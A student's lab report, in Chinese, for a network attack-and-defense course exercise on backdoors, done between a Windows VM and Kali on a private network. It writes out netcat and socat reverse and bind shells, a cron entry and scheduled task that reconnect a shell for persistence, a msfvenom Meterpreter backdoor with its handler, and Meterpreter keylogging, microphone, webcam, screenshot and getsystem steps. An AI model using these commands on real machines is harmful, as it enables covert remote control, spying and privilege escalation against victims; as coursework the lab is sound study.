Exp2 後門原理與實踐 20154301仉鑫燁
20154301《網絡對抗》Exp2 後門原理與實踐
20154301仉鑫燁
一、實驗內容
常用後門工具實踐:
- Windows獲得Linux Shell:
在Windows下,先使用
ipconfig
指令查看win7虛擬機IP:
使用
ncat.exe
程序監聽本機的4301
端口:
Kali:使用nc指令的-e選項反向連接Windows主機的
4301
端口:
Windows下成功獲得了一個Kali的shell,運行ls指令如下:
- Linux獲得Windows Shell:
過程與之前的類似,在Kali環境下用
ifconfig
查看IP:
使用
nc
指令監聽4301
端口:
在Windows下,使用
ncat.exe
-e
選項項反向連接Kali主機的4301
端口:
Kali下可以看到Windows的命令提示,可以輸入Windows命令:
- 使用nc傳輸數據:
Windows下監聽
4301
端口:
Kali下連接到Windows的
4301
端口:
建立連接之後,就可以傳輸數據了,這裏傳輸的是字符串,相當於兩臺主機在聊天,也可以用重定向操作符來傳輸文件:
使用netcat獲取主機操作Shell,cron啟動
先在Windows系統下,監聽
4301
端口:
在Kali環境下,使用
man crontab
指令查看crontab
命令的幫助文檔,從文檔中我們可以知道crontab
指令可以用於設置周期性被執行的指令。該命令從標準輸入設備讀取指令,並將其存放於crontab
用
crontab -e
指令編輯一條定時任務,選擇編輯器時選擇基本的vim編輯器就行:
(最後一行為44 * * * * /bin/netcat 192.168.108.131 4301 -e /bin/sh
,意思是在每個小時的第44分鐘反向連接Windows主機的4301端口,此時時間為16:43)
時間到16點44分,此時已經獲得了Kali的shell,可以輸入指令(如果在這之前輸入指令,屏幕上不會有顯示,但是等到了44分時會立馬顯示出來):
使用socat獲取主機操作Shell, 任務計劃啟動
基礎知識:
socat
是ncat
的增強版,它使用的格式是socat [options] <address> <address>
address
是必選項,而options
是可選項。
socat
的基本功能就是建立兩個雙向的字節流,數據就在其間傳輸,參數address
就是代表了其中的一個方向。所謂流,代表了數據的流向,而數據則可以有許多不同的類型,命令中也就相應需要許多選項對各種不同的類型數據流進行限定與說明。
在Windows系統下,打開控制面板->管理工具->任務計劃程序,創建任務,填寫任務名稱後,新建一個觸發器:
在操作->程序或腳本中選擇你的
socat.exe
文件的路徑,在添加參數一欄填寫tcp-listen:4301 exec:cmd.exe,pty,stderr
,這個命令的作用是把cmd.exe
綁定到端口4301,同時把cmd.exe
的stderr重定向到stdout上:
創建完成之後,可以
windows+L
鎖定計算機讓它執行。
此時,在Kali環境下輸入指令
socat - tcp:192.168.108.131:4301
,這裏的第一個參數-代表標準的輸入輸出,第二個流連接到Windows主機的4301
端口,此時可以發現已經成功獲得了一個cmd shell:
使用MSF meterpreter(或其他軟件)生成可執行文件,利用ncat或socat傳送到主機並運行獲取主機Shell
輸入指令
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.108.131 LPORT=4301 -f exe > 20154301_backdoor.exe
生成後門程序:
通過‘nc‘指令將生成的後門程序傳送到Windows主機上:
在Kali上使用
msfconsole
指令進入msf控制臺,使用監聽模塊,設置payload,設置反彈回連的IP和端口:use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
設置完成後,執行監聽:
打開Windows上的後門程序:
20154301_backdoor.exe
此時Kali上已經獲得了Windows主機的連接,並且得到了遠程控制的shell:
使用MSF meterpreter(或其他軟件)生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容,並嘗試提權
使用
record_mic
指令截獲一段音頻:
- 使用
webcam_snap
指令可以使用攝像頭進行拍照:(電腦沒有色相頭!!) 使用screenshot指令可以進行截屏:
使用
keyscan_start
指令開始記錄下擊鍵的過程,使用keyscan_dump
指令讀取擊鍵的記錄:
先使用getuid指令查看當前用戶,使用getsystem指令進行提權,如圖所示,提權成功:
Exp2 後門原理與實踐 20154301仉鑫燁